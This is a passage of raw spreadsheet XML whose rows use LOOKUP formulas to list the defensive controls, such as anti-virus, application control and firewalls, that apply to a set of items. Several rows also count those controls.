      <c r="G32" s="19"/>
    </row>
    <row r="33" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A33" s="16" t="s">
        <v>96</v>
      </c>
      <c r="B33" s="45" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C33" s="17">
        <v>0</v>
      </c>
      <c r="D33" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E33" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F33" s="50"/>
      <c r="G33" s="19"/>
    </row>
    <row r="34" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A34" s="16" t="s">
        <v>98</v>
      </c>
      <c r="B34" s="45" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C34" s="17">
        <v>0</v>
      </c>
      <c r="D34" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E34" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F34" s="50"/>
      <c r="G34" s="19"/>
    </row>
    <row r="35" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A35" s="16" t="s">
        <v>100</v>
      </c>
      <c r="B35" s="45" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C35" s="17">
        <v>0</v>
      </c>
      <c r="D35" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E35" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F35" s="50"/>
      <c r="G35" s="19"/>
    </row>
    <row r="36" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A36" s="16" t="s">
        <v>101</v>
      </c>
      <c r="B36" s="45" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C36" s="17">
        <v>0</v>
      </c>
      <c r="D36" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E36" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F36" s="50"/>
      <c r="G36" s="19"/>
    </row>
    <row r="37" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A37" s="16" t="s">
        <v>102</v>
      </c>
      <c r="B37" s="45" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:H)</f>
        <v>Application control by file name or path</v>
      </c>
      <c r="C37" s="17">
        <v>100</v>
      </c>
      <c r="D37" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E37" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F37" s="50"/>
      <c r="G37" s="19"/>
    </row>
    <row r="38" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A38" s="16" t="s">
        <v>103</v>
      </c>
      <c r="B38" s="45" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C38" s="17">
        <v>0</v>
      </c>
      <c r="D38" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E38" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F38" s="50"/>
      <c r="G38" s="19"/>
    </row>
    <row r="39" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A39" s="16" t="s">
        <v>105</v>
      </c>
      <c r="B39" s="45" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C39" s="17">
        <v>100</v>
      </c>
      <c r="D39" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E39" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F39" s="50"/>
      <c r="G39" s="19"/>
    </row>
    <row r="40" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A40" s="16" t="s">
        <v>106</v>
      </c>
      <c r="B40" s="45" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C40" s="17">
        <v>0</v>
      </c>
      <c r="D40" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E40" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F40" s="50"/>
      <c r="G40" s="19"/>
    </row>
    <row r="41" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A41" s="16" t="s">
        <v>108</v>
      </c>
      <c r="B41" s="45" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C41" s="17">
        <v>0</v>
      </c>
      <c r="D41" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E41" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F41" s="50"/>
      <c r="G41" s="19"/>
    </row>
    <row r="42" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A42" s="16" t="s">
        <v>110</v>
      </c>
      <c r="B42" s="45" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C42" s="17">
        <v>0</v>
      </c>
      <c r="D42" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E42" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F42" s="50"/>
      <c r="G42" s="19"/>
    </row>
    <row r="43" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A43" s="16" t="s">
        <v>112</v>
      </c>
      <c r="B43" s="45" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C43" s="17">
        <v>0</v>
      </c>
      <c r="D43" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E43" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F43" s="50"/>
      <c r="G43" s="19"/>
    </row>
    <row r="44" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A44" s="16" t="s">
        <v>113</v>
      </c>
      <c r="B44" s="45" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C44" s="17">
        <v>0</v>
      </c>
      <c r="D44" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E44" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F44" s="50"/>
      <c r="G44" s="19"/>
    </row>
    <row r="45" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A45" s="16" t="s">
        <v>115</v>
      </c>
      <c r="B45" s="45" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C45" s="17">
        <v>0</v>
      </c>
      <c r="D45" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E45" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F45" s="50"/>
      <c r="G45" s="19"/>
    </row>
    <row r="46" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A46" s="16" t="s">
        <v>116</v>
      </c>
      <c r="B46" s="45" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C46" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D46" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E46" s="45">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F46" s="50"/>
      <c r="G46" s="19"/>
    </row>
    <row r="47" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A47" s="16" t="s">
        <v>117</v>
      </c>
      <c r="B47" s="45" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C47" s="17">
        <v>0</v>
      </c>
      <c r="D47" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E47" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F47" s="50"/>
      <c r="G47" s="19"/>
    </row>
    <row r="48" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A48" s="16" t="s">
        <v>118</v>
      </c>
      <c r="B48" s="45" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C48" s="17">
        <v>0</v>
      </c>
      <c r="D48" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E48" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F48" s="50"/>
      <c r="G48" s="19"/>
    </row>
    <row r="49" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A49" s="16" t="s">
        <v>119</v>
      </c>
      <c r="B49" s="45" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C49" s="17">
        <v>0</v>
      </c>
      <c r="D49" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E49" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F49" s="50"/>
      <c r="G49" s="19"/>
    </row>
    <row r="50" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A50" s="16" t="s">
        <v>121</v>
      </c>
      <c r="B50" s="45" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C50" s="17">
        <v>0</v>
      </c>
      <c r="D50" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E50" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F50" s="50"/>
      <c r="G50" s="19"/>
    </row>
    <row r="51" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A51" s="16" t="s">
        <v>123</v>
      </c>
      <c r="B51" s="45" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C51" s="17">
        <v>0</v>
      </c>
      <c r="D51" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E51" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F51" s="50"/>
      <c r="G51" s="19"/>
    </row>
    <row r="52" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A52" s="16" t="s">
        <v>124</v>
      </c>
      <c r="B52" s="45" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C52" s="17">
        <v>0</v>
      </c>
      <c r="D52" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E52" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F52" s="50"/>
      <c r="G52" s="19"/>
    </row>
    <row r="53" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A53" s="16" t="s">
        <v>125</v>
      </c>
      <c r="B53" s="45" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C53" s="17">
        <v>0</v>
      </c>
      <c r="D53" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E53" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F53" s="50"/>
      <c r="G53" s="19"/>
    </row>
    <row r="54" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A54" s="16" t="s">
        <v>127</v>
      </c>
      <c r="B54" s="45" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C54" s="17">
        <v>0</v>
      </c>
      <c r="D54" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E54" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F54" s="50"/>
      <c r="G54" s="19"/>
    </row>
    <row r="55" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A55" s="16" t="s">
        <v>129</v>
      </c>
      <c r="B55" s="45" t="str">
        <f>LOOKUP(A55,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C55" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D55" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E55" s="45">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F55" s="50"/>
      <c r="G55" s="19"/>
    </row>
    <row r="56" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A56" s="16" t="s">
        <v>131</v>
      </c>
      <c r="B56" s="45" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:H)</f>
        <v>Application control,Anti-virus</v>
      </c>
      <c r="C56" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D56" s="45">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E56" s="45">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F56" s="50"/>
      <c r="G56" s="19"/>
    </row>
    <row r="57" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A57" s="16" t="s">
        <v>133</v>
      </c>
      <c r="B57" s="45" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C57" s="17">
        <v>0</v>
      </c>
      <c r="D57" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E57" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F57" s="50"/>
      <c r="G57" s="19"/>
    </row>
    <row r="58" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A58" s="16" t="s">
        <v>135</v>
      </c>
      <c r="B58" s="45" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C58" s="17">
        <v>0</v>
      </c>
      <c r="D58" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E58" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F58" s="50"/>
      <c r="G58" s="19"/>
    </row>
    <row r="59" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A59" s="16" t="s">
        <v>136</v>
      </c>
      <c r="B59" s="45" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C59" s="17">
        <v>0</v>
      </c>
      <c r="D59" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E59" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F59" s="50"/>
      <c r="G59" s="19"/>
    </row>
    <row r="60" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A60" s="16" t="s">
        <v>138</v>
      </c>
      <c r="B60" s="45" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C60" s="17">
        <v>0</v>
      </c>
      <c r="D60" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E60" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F60" s="50"/>
      <c r="G60" s="19"/>
    </row>
    <row r="61" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A61" s="16" t="s">
        <v>139</v>
      </c>
      <c r="B61" s="45" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C61" s="17">
        <v>0</v>
      </c>
      <c r="D61" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E61" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F61" s="50"/>
      <c r="G61" s="19"/>
    </row>
    <row r="62" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A62" s="16" t="s">
        <v>141</v>
      </c>
      <c r="B62" s="45" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C62" s="17">
        <v>0</v>
      </c>
      <c r="D62" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E62" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F62" s="50"/>
      <c r="G62" s="19"/>
    </row>
    <row r="63" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A63" s="16" t="s">
        <v>142</v>
      </c>
      <c r="B63" s="45" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C63" s="17">
        <v>0</v>
      </c>
      <c r="D63" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E63" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F63" s="50"/>
      <c r="G63" s="19"/>
    </row>
    <row r="64" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A64" s="16" t="s">
        <v>143</v>
      </c>
      <c r="B64" s="45" t="str">
        <f>LOOKUP(A64,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C64" s="17">
        <v>0</v>
      </c>
      <c r="D64" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E64" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F64" s="50"/>
      <c r="G64" s="19"/>
    </row>
    <row r="65" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A65" s="16" t="s">
        <v>145</v>
      </c>
      <c r="B65" s="45" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:H)</f>
        <v>Process whitelisting,Data Execution Prevention,Exploit Prevention</v>
      </c>
      <c r="C65" s="17" t="s">
        <v>78</v>
      </c>
      <c r="D65" s="45">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E65" s="45">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F65" s="50"/>
      <c r="G65" s="19"/>
    </row>
    <row r="66" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A66" s="16" t="s">
        <v>147</v>
      </c>
      <c r="B66" s="45" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:H)</f>
        <v>Process whitelisting,Data Execution Prevention,Exploit Prevention</v>
      </c>
      <c r="C66" s="17">
        <v>0</v>
      </c>
      <c r="D66" s="45">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E66" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F66" s="50"/>
      <c r="G66" s="19"/>
    </row>
    <row r="67" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A67" s="16" t="s">
        <v>148</v>
      </c>
      <c r="B67" s="45" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:H)</f>
        <v>Process whitelisting,Data Execution Prevention,Exploit Prevention</v>
      </c>
      <c r="C67" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D67" s="45">
        <f t="shared" ref="D67:D130" si="3">LEN(TRIM(B67))-LEN(SUBSTITUTE(TRIM(B67),",",""))+1</f>
        <v>3</v>
      </c>
      <c r="E67" s="45">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F67" s="50"/>
      <c r="G67" s="19"/>
    </row>
    <row r="68" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A68" s="16" t="s">
        <v>149</v>
      </c>
      <c r="B68" s="45" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:H)</f>
        <v>Process whitelisting,Data Execution Prevention,Exploit Prevention</v>
      </c>
      <c r="C68" s="17">
        <v>0</v>
      </c>
      <c r="D68" s="45">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E68" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F68" s="50"/>
      <c r="G68" s="19"/>
    </row>
    <row r="69" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A69" s="16" t="s">
        <v>151</v>
      </c>
      <c r="B69" s="45" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C69" s="17">
        <v>0</v>
      </c>
      <c r="D69" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E69" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F69" s="50"/>
      <c r="G69" s="19"/>
    </row>
    <row r="70" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A70" s="16" t="s">
        <v>153</v>
      </c>
      <c r="B70" s="45" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C70" s="17">
        <v>0</v>
      </c>
      <c r="D70" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E70" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F70" s="50"/>
      <c r="G70" s="19"/>
    </row>
    <row r="71" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A71" s="16" t="s">
        <v>154</v>
      </c>
      <c r="B71" s="45" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:H)</f>
        <v>Log analysis,Host intrusion prevention systems,Anti-virus</v>
      </c>
      <c r="C71" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D71" s="45">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E71" s="45">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F71" s="50"/>
      <c r="G71" s="19"/>
    </row>
    <row r="72" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A72" s="16" t="s">
        <v>155</v>
      </c>
      <c r="B72" s="45" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C72" s="17">
        <v>0</v>
      </c>
      <c r="D72" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E72" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F72" s="50"/>
      <c r="G72" s="19"/>
    </row>
    <row r="73" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A73" s="16" t="s">
        <v>157</v>
      </c>
      <c r="B73" s="45" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C73" s="17">
        <v>0</v>
      </c>
      <c r="D73" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E73" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F73" s="50"/>
      <c r="G73" s="19"/>
    </row>
    <row r="74" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A74" s="16" t="s">
        <v>159</v>
      </c>
      <c r="B74" s="45" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C74" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D74" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E74" s="45">
        <f t="shared" ref="E74:E137" si="4">LEN(TRIM(C74))-LEN(SUBSTITUTE(TRIM(C74),";",""))+1</f>
        <v>2</v>
      </c>
      <c r="F74" s="50"/>
      <c r="G74" s="19"/>
    </row>
    <row r="75" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A75" s="16" t="s">
        <v>160</v>
      </c>
      <c r="B75" s="45" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C75" s="17">
        <v>0</v>
      </c>
      <c r="D75" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E75" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F75" s="50"/>
      <c r="G75" s="19"/>
    </row>
    <row r="76" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A76" s="16" t="s">
        <v>161</v>
      </c>
      <c r="B76" s="45" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C76" s="17">
        <v>0</v>
      </c>
      <c r="D76" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E76" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F76" s="50"/>
      <c r="G76" s="19"/>
    </row>
    <row r="77" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A77" s="16" t="s">
        <v>162</v>
      </c>
      <c r="B77" s="45" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C77" s="17">
        <v>0</v>
      </c>
      <c r="D77" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E77" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F77" s="50"/>
      <c r="G77" s="19"/>
    </row>
    <row r="78" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A78" s="16" t="s">
        <v>163</v>
      </c>
      <c r="B78" s="45" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C78" s="17">
        <v>0</v>
      </c>
      <c r="D78" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E78" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F78" s="50"/>
      <c r="G78" s="19"/>
    </row>
    <row r="79" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A79" s="16" t="s">
        <v>165</v>
      </c>
      <c r="B79" s="45" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:H)</f>
        <v>Firewall,Host intrusion prevention systems,Network intrusion detection system,Application control,System access controls,Anti-virus</v>
      </c>
      <c r="C79" s="17" t="s">
        <v>403</v>
      </c>
      <c r="D79" s="45">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E79" s="45">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F79" s="50"/>
      <c r="G79" s="19"/>
    </row>
    <row r="80" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A80" s="16" t="s">
        <v>167</v>
      </c>
      <c r="B80" s="45" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C80" s="17">
        <v>0</v>
      </c>
      <c r="D80" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E80" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F80" s="50"/>
      <c r="G80" s="19"/>
    </row>
    <row r="81" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A81" s="16" t="s">
        <v>169</v>
      </c>
      <c r="B81" s="45" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C81" s="17">
        <v>0</v>
      </c>
      <c r="D81" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E81" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F81" s="50"/>
      <c r="G81" s="19"/>
    </row>
    <row r="82" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A82" s="16" t="s">
        <v>170</v>
      </c>
      <c r="B82" s="45" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C82" s="17">
        <v>0</v>
      </c>
      <c r="D82" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E82" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F82" s="50"/>
      <c r="G82" s="19"/>
    </row>
    <row r="83" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A83" s="16" t="s">
        <v>171</v>
      </c>
      <c r="B83" s="45" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C83" s="17">
        <v>0</v>
      </c>
      <c r="D83" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E83" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F83" s="50"/>
      <c r="G83" s="19"/>
    </row>
    <row r="84" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A84" s="16" t="s">
        <v>172</v>
      </c>
      <c r="B84" s="45" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C84" s="17">
        <v>0</v>
      </c>
      <c r="D84" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E84" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F84" s="50"/>
      <c r="G84" s="19"/>
    </row>
    <row r="85" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A85" s="16" t="s">
        <v>173</v>
      </c>
      <c r="B85" s="45" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C85" s="17">
        <v>0</v>
      </c>
      <c r="D85" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E85" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F85" s="50"/>
      <c r="G85" s="19"/>
    </row>
    <row r="86" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A86" s="16" t="s">
        <v>174</v>
      </c>
      <c r="B86" s="45" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C86" s="17" t="s">
        <v>122</v>
      </c>
      <c r="D86" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E86" s="45">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F86" s="50"/>
      <c r="G86" s="19"/>
    </row>
    <row r="87" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A87" s="16" t="s">
        <v>176</v>
      </c>
      <c r="B87" s="45" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C87" s="17">
        <v>0</v>
      </c>
      <c r="D87" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E87" s="45">
        <f t="shared" si="4"/>
